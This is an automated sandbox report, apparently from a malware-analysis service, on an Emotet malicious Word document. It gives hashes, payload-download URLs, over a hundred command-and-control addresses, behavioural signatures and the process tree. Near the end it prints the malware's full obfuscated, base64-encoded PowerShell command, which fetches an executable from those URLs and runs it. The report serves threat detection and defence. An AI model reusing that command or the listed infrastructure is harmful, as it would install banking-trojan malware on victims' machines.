Analysis
- max time kernel: 19s
- max time network: 19s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 28-10-2020 21:01
- Static task: static1
General
- Target: 5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc
- Size: 224KB
- MD5: f87d49246f2654da56ae321bdc8b58d8
- SHA1: ef8f3f04dd249fa7dbc737d7d346020ff308f94f
- SHA256: 5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2
- SHA512: fb02be18f2ea24f0e0a970fd517dddce90c923cbdb3d1e0137031cfe0780741170ff6379dc10c5fd586e3109fa49d95a00a99ef55122b19f1b2ff730675567dc
Malware Config
Extracted
URLs:
https://getpranaveda.xyz/wp-admin/yz/
http://xinhecun.cn/wp-content/VCNbWWDK/
https://www.apeduti.com.br/wp-includes/XN2wg26v/
http://heankan.bio/js/Rb/
https://sheen-vietnam.vn/wp-content/qtg2J6XhZ/
https://madrushdigital.com/wp-admin/PJi/
https://lunabituyelik.com/wp-content/fWd0/
Extracted
Family: emotet
Botnet: Epoch3
C2:
152.32.75.74:443
91.121.200.35:8080
159.203.16.11:8080
188.226.165.170:8080
172.193.79.237:80
123.216.134.52:80
183.91.3.63:80
139.59.61.215:443
185.80.172.199:80
77.74.78.80:443
153.229.219.1:443
113.203.238.130:80
120.51.34.254:80
116.202.10.123:8080
5.2.246.108:80
50.116.78.109:8080
103.80.51.61:8080
190.55.186.229:80
185.142.236.163:443
223.17.215.76:80
188.80.27.54:80
78.90.78.210:80
213.165.178.214:80
82.78.179.117:443
178.33.167.120:8080
58.27.215.3:8080
190.212.140.6:80
177.130.51.198:80
187.193.221.143:80
190.194.12.132:80
5.79.70.250:8080
2.82.75.215:80
79.133.6.236:8080
8.4.9.137:8080
188.166.220.180:7080
203.56.191.129:8080
58.94.58.13:80
189.123.103.233:80
190.180.65.104:80
54.38.143.245:8080
46.105.131.68:8080
119.228.75.211:80
162.144.145.58:8080
36.91.44.183:80
41.76.213.144:8080
202.29.237.113:8080
47.154.85.229:80
42.200.96.63:80
195.201.56.70:8080
41.185.29.128:8080
74.208.173.91:8080
91.83.93.103:443
126.126.139.26:443
190.85.46.52:7080
103.229.73.17:8080
203.153.216.178:7080
192.163.221.191:8080
113.161.148.81:80
115.79.59.157:80
78.101.224.151:80
73.55.128.120:80
180.148.4.130:8080
2.58.16.86:8080
192.210.217.94:8080
117.2.139.117:443
139.59.12.63:8080
179.5.118.12:80
5.2.164.75:80
178.254.36.182:8080
175.103.38.146:80
192.241.220.183:8080
198.20.228.9:8080
115.79.195.246:80
45.239.204.100:80
200.243.153.66:80
109.13.179.195:80
37.205.9.252:7080
172.105.78.244:8080
109.99.146.210:8080
121.117.147.153:443
46.32.229.152:8080
143.95.101.72:8080
157.7.164.178:8081
37.46.129.215:8080
73.100.19.104:80
181.59.59.54:80
5.12.246.155:80
60.108.128.186:80
185.208.226.142:8080
110.37.224.243:80
172.96.190.154:8080
75.127.14.170:8080
51.38.50.144:8080
103.93.220.182:80
109.206.139.119:80
95.76.142.243:80
190.164.135.81:80
190.192.39.136:80
197.221.227.78:80
85.246.78.192:80
91.75.75.46:80
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 608 | 1292 | POwersheLL.exe
Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
Processes:
resource | yara_rule
behavioral1/memory/1724-13-0x0000000002280000-0x00000000022C3000-memory.dmp | emotet
behavioral1/memory/1724-14-0x00000000022D0000-0x0000000002312000-memory.dmp | emotet
behavioral1/memory/1168-18-0x00000000003A0000-0x00000000003E3000-memory.dmp | emotet
behavioral1/memory/1168-19-0x0000000000570000-0x00000000005B2000-memory.dmp | emotet
Blacklisted process makes network request (2 IoCs)
Processes:
flow | pid | process
7 | 608 | POwersheLL.exe
9 | 608 | POwersheLL.exe
Executes dropped EXE (2 IoCs)
Processes:
pid | process
1724 | Avqv7t89l.exe
1168 | rdprefdrvapi.exe
Drops file in System32 directory (2 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | POwersheLL.exe
File opened for modification | C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exe | Avqv7t89l.exe
Drops file in Windows directory (1 IoC)
Processes:
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Modifies registry class (280 IoCs, partial listing)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\HELPDIR | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0 | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\ = "Microsoft Forms 2.0 Object Library" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\0\win32 | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
pid | process
108 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
pid | process
608 | POwersheLL.exe
608 | POwersheLL.exe
1168 | rdprefdrvapi.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
description | pid | process
Token: SeDebugPrivilege | 608 | POwersheLL.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
pid | process
108 | WINWORD.EXE
108 | WINWORD.EXE
Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
description | pid | process | target process
PID 108 wrote to memory of 856 | 108 | WINWORD.EXE | splwow64.exe
PID 108 wrote to memory of 856 | 108 | WINWORD.EXE | splwow64.exe
PID 108 wrote to memory of 856 | 108 | WINWORD.EXE | splwow64.exe
PID 108 wrote to memory of 856 | 108 | WINWORD.EXE | splwow64.exe
PID 1724 wrote to memory of 1168 | 1724 | Avqv7t89l.exe | rdprefdrvapi.exe
PID 1724 wrote to memory of 1168 | 1724 | Avqv7t89l.exe | rdprefdrvapi.exe
PID 1724 wrote to memory of 1168 | 1724 | Avqv7t89l.exe | rdprefdrvapi.exe
PID 1724 wrote to memory of 1168 | 1724 | Avqv7t89l.exe | rdprefdrvapi.exe
Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc"
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

  C:\Windows\splwow64.exe (child of WINWORD.EXE)
  Command line: C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD UwBlAHQALQBJAFQARQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgBFADMAOABaADYAIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADAAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwB0AEUATQAnACwAJwBpAHIAJwAsACcARQBDAHQAbwBSAHkAJwAsACcAUwB5AFMAJwAsACcALgBpAG8AJwAsACcALgBEACcAKQApACAAOwBzAGUAVAAtAHYAQQByAGkAYQBCAEwARQAgACAARgBFAEIAOABXACAAIAAoACAAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsAMAB9AHsANgB9AHsAMwB9AHsAMQB9AHsANAB9ACIAIAAtAGYAJwBFAE0ALgAnACwAJwBFAFAAbwBJACcALAAnAFMAJwAsACcALgBzAEUAcgBWAEkAYwAnACwAJwBOAFQAbQBhAG4AQQBnAEUAcgAnACwAJwBZAFMAVAAnACwAJwBuAGUAdAAnACkAKQAgACAAOwAkAFgAawBoADUAbQBvAGQAPQAoACgAJwBTAHkAcAAnACsAJwB6AHgAJwApACsAJwB3ACcAKwAnAHIAJwApADsAJABVADgANAB0AHQANwBjAD0AJABVAG0AawBoAHIAbwBzACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFAHUAXwBhADMAcgA5ADsAJABJAGwAeABpAHkAagBjAD0AKAAoACcARQAzACcAKwAnAGkAJwApACsAJwBuAGwAJwArACcAawB1ACcAKQA7ACAAJABFADMAOAB6ADYAOgA6ACIAYwBgAFIAZQBgAEEAVABgAEUAYABEAEkAUgBFAGMAdABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAaAA5AEwAJwArACcARABrAHUAOQAnACsAJwBiACcAKQArACgAJwAxAF8AaAAnACsAJwA5ACcAKQArACcATABBACcAKwAnAGEAJwArACgAJwBwAG4AMQB2AHYAJwArACcAaAA5ACcAKwAnAEwAJwApACkALQBSAEUAcABMAGEAQwBFACgAWwBjAGgAQQByAF0AMQAwADQAKwBbAGMAaABBAHIAXQA1ADcAKwBbAGMAaABBAHIAXQA3ADYAKQAsAFsAYwBoAEEAcgBdADkAMgApACkAOwAkAE8AZwB3AG8AbABvAGEAPQAoACgAJwBVAHkAJwArACcAeAAnACkAKwAoACcANABvACcAKwAnAGQAJwApACsAJwBfACcAKQA7ACAAKAAgAEcAYwBpACAAIABWAEEAcgBJAEEAYgBMAEUAOgBmAEUAQgA4AFcAIAApAC4AdgBhAEwAVQBFADoAOgAiAHMAZQBgAGMAdQBSAGAAaQB0AGAAWQBQAHIATwBUAE8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFQAaABtAGwAXwBqAHUAPQAoACgAJwBHAHMAYQB6ACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGkAJwApADsAJABDADUAMgBwAHIAYQBtACAAPQAgACgAKAAnAEEAJwArACcAdgBxACcAKQArACgAJwB2ADcAdAAnACsAJwA4ADkAbAAnACkAKQA7ACQATABhAHcAawBvAGMANAA9ACgAJwBRAGQAJwArACcAMABpACcAKwAoACcAcABsACcAKwAnAHcAJwApACkAOwAkAEQANABuAGwAbAB5AHAAPQAoACcAVQAnACsAKAAnADQAeQAnACsAJwBwACcAKQArACgAJwBuACcAKwAnAGkAbAAnACkAKQA7ACQAWQB1AGwAaAB2A
HAAZgA9ACQASABPAE0ARQArACgAKAAoACcAZwAnACsAJwBVADgAJwApACsAKAAnAEQAJwArACcAawB1ACcAKQArACgAJwA5ACcAKwAnAGIAMQBfACcAKwAnAGcAVQA4ACcAKQArACcAQQAnACsAKAAnAGEAcAAnACsAJwBuADEAdgAnACkAKwAoACcAdgBnAFUAJwArACcAOAAnACkAKQAuACIAcgBFAFAAYABMAEEAYABDAEUAIgAoACgAJwBnACcAKwAnAFUAOAAnACkALABbAHMAVABSAEkATgBHAF0AWwBDAGgAQQBSAF0AOQAyACkAKQArACQAQwA1ADIAcAByAGEAbQArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEEANgA1AHUAOABfAGUAPQAoACgAJwBYACcAKwAnAGgAcwBmADkANAAnACkAKwAnAGcAJwApADsAJABOAHUAcAByAHIAbQA4AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcAZQBCAGMAbABpAEUATgB0ADsAJABQAGcAYQB0AGgAcgBhAD0AKAAoACcAaAAnACsAKAAnAHQAdABwAHMAJwArACcAOgBdAFsAJwApACsAJwAgACcAKwAoACgAJwAxACkAIAAnACsAJwBqACcAKQApACsAKAAnAGoAJwArACcAawBnACcAKQArACcAUwAnACsAJwAgAFsAJwArACgAKAAnAF0AIABbAF0AdwBdAFsAJwArACcAIAAxACcAKwAnACkAJwArACcAIAAnACkAKQArACcAagAnACsAKAAnAGoAawBnACcAKwAnAFMAIAAnACkAKwAoACcAWwBdACAAWwAnACsAJwBdAHcAJwApACsAKAAnAGcAZQB0AHAAJwArACcAcgBhAG4AYQAnACsAJwB2AGUAZAAnACkAKwAoACcAYQAnACsAJwAuACcAKwAnAHgAeQB6AF0AWwAgACcAKQArACgAKAAnADEAKQAnACkAKQArACgAJwAgAGoAagAnACsAJwBrACcAKQArACcAZwBTACcAKwAnACAAJwArACcAWwAnACsAKAAnAF0AIABbACcAKwAnAF0AJwApACsAKAAnAHcAJwArACcAdwBwAC0AYQBkAG0AaQBuACcAKwAnAF0AJwApACsAJwBbACcAKwAnACAAJwArACgAKAAnADEAKQAgACcAKwAnAGoAagAnACsAJwBrAGcAJwApACkAKwAnAFMAJwArACgAJwAgAFsAJwArACcAXQAgACcAKwAnAFsAXQAnACkAKwAoACcAdwB5AHoAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAnACsAJwAgAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAUwAgAFsAXQAnACkAKwAoACcAIAAnACsAJwBbAF0AdwAnACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAoACcAcAA6ACcAKwAnAF0AJwApACsAKAAnAFsAIAAnACsAJwAxACcAKQArACgAKAAnACkAJwArACcAIABqACcAKQApACsAJwBqAGsAJwArACgAJwBnAFMAJwArACcAIABbAF0AIAAnACkAKwAoACcAWwAnACsAJwBdAHcAXQAnACkAKwAoACgAJwBbACAAMQApACcAKwAnACAAJwArACcAagBqAGsAZwAnACkAKQArACgAJwBTACAAWwBdACcAKwAnACAAWwBdACcAKwAnAHcAeABpAG4AJwArACcAaABlAGMAdQAnACkAKwAnAG4AJwArACgAJwAuAGMAbgBdAFsAJwArACcAIAAnACkAKwAoACgAJwAxACkAIABqAGoAJwArACcAawAnACkAKQArACcAZwBTACcAKwAoACcAIABbACcAKwAnAF0AIABbACcAKwAnA
F0AJwApACsAKAAnAHcAdwAnACsAJwBwAC0AYwAnACkAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAXQBbACAAJwApACsAKAAoACcAMQAnACsAJwApACAAJwApACkAKwAoACcAagBqAGsAZwAnACsAJwBTACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAVgBDACcAKQArACgAJwBOAGIAJwArACcAVwAnACkAKwAoACcAVwBEACcAKwAnAEsAJwApACsAKAAnAF0AWwAnACsAJwAgACcAKQArACgAKAAnADEAKQAnACkAKQArACgAJwAgACcAKwAnAGoAagBrAGcAJwApACsAKAAnAFMAIABbAF0AJwArACcAIAAnACkAKwAoACcAWwBdAHcAQAAnACsAJwBoACcAKQArACcAdAAnACsAJwB0ACcAKwAoACcAcABzACcAKwAnADoAXQAnACsAJwBbACAAMQAnACkAKwAoACgAJwApACAAagAnACsAJwBqACcAKQApACsAKAAnAGsAZwBTACcAKwAnACAAWwAnACsAJwBdACAAJwApACsAKAAnAFsAJwArACcAXQB3AF0AWwAnACkAKwAnACAAMQAnACsAKAAoACcAKQAgACcAKQApACsAKAAnAGoAagAnACsAJwBrACcAKQArACgAJwBnAFMAIAAnACsAJwBbACcAKQArACgAJwBdACAA